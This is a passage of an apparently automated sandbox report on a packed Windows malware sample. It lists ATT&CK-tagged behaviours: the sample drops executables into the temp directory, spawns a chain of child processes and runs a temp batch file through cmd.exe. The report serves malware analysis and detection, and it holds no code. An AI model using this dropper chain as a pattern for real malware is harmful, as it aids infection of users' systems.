with a parameter comctl32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter comdlg32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter msimg32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter winspool.drv (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter RICHED20.DLL (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter WS2_32.DLL (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter Fwpuclnt.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772D0000\n \"meorm.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772D0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772D0000\n \"lojebo.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772D0000\n \"ywrej.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"meorm.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"meorm.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"meorm.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"lojebo.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"lojebo.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"lojebo.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"ywrej.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"ywrej.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"ywrej.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ywrej.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ywrej.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"meorm.exe\" (UID: 00000000-00006120)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004296)\n Spawned process \"lojebo.exe\" with commandline \"OK\" (UID: 00000000-00003636)\n Spawned process \"ywrej.exe\" (UID: 00000000-00001924)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00001552)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"meorm.exe\" (UID: 00000000-00006120)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004296)\n Spawned process \"lojebo.exe\" with commandline \"OK\" (UID: 00000000-00003636)\n Spawned process \"ywrej.exe\" (UID: 00000000-00001924)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00001552)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004296)\n Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00001552)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" was detected as \"VMProtect\" and name: \"Protector\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"ywrej.exe\" was detected as \"VMProtect\" and name: \"Protector\"\n \"ywrej.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A48065.bin\" was detected as \"VMProtect\" and name: \"Protector\"\n \"DISMHOST.EXE.67A48065.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".-(H\" is \"0x353fba\" greater than 0x100000\n Virtual size of \".Jk)\" is \"0x664c30\" greater than 0x100000\n Virtual size of \"UPX0\" is \"0x125000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A48065.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"ywrej.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"DISMHOST.EXE.67A48065.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"meorm.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"lojebo.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"ywrej.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"ywrej.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\ywrej.exe]- [targetUID: 00000000-00003636]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"meorm.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"lojebo.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" connecting to \"\\ThemeApiPort\"\n \"meorm.exe\" connecting to \"\\ThemeApiPort\"\n \"lojebo.exe\" connecting to \"\\ThemeApiPort\"\n \"ywrej.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\iphlpapi.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\iphlpapi.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe.Local\\\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe:Zone.Identifier\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:Zone.Identifier\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFINFO.INI\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFSET.INI\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\F1644FF690CEAC14AB04E7E712D64EC91B0C0C8DF3689844A47F9A02DEE0A814.EXE.LOCAL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe:ZONE.IDENTIFIER\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:ZONE.IDENTIFIER\"\n \"meorm.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"meorm.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe.Local\\\"\n \"meorm.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe:Zone.Identifier\"\n \"meorm.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFSET.INI\"\n \"meorm.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\MEORM.EXE.LOCAL\"\n \"meorm.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe:ZONE.IDENTIFIER\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_VSLITE.BAT\"\n \"lojebo.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"lojebo.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe.Local\\\"\n \"lojebo.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ywrej.exe:Zone.Identifier\"\n \"lojebo.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\golfinfo.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\meorm.exe\"\n 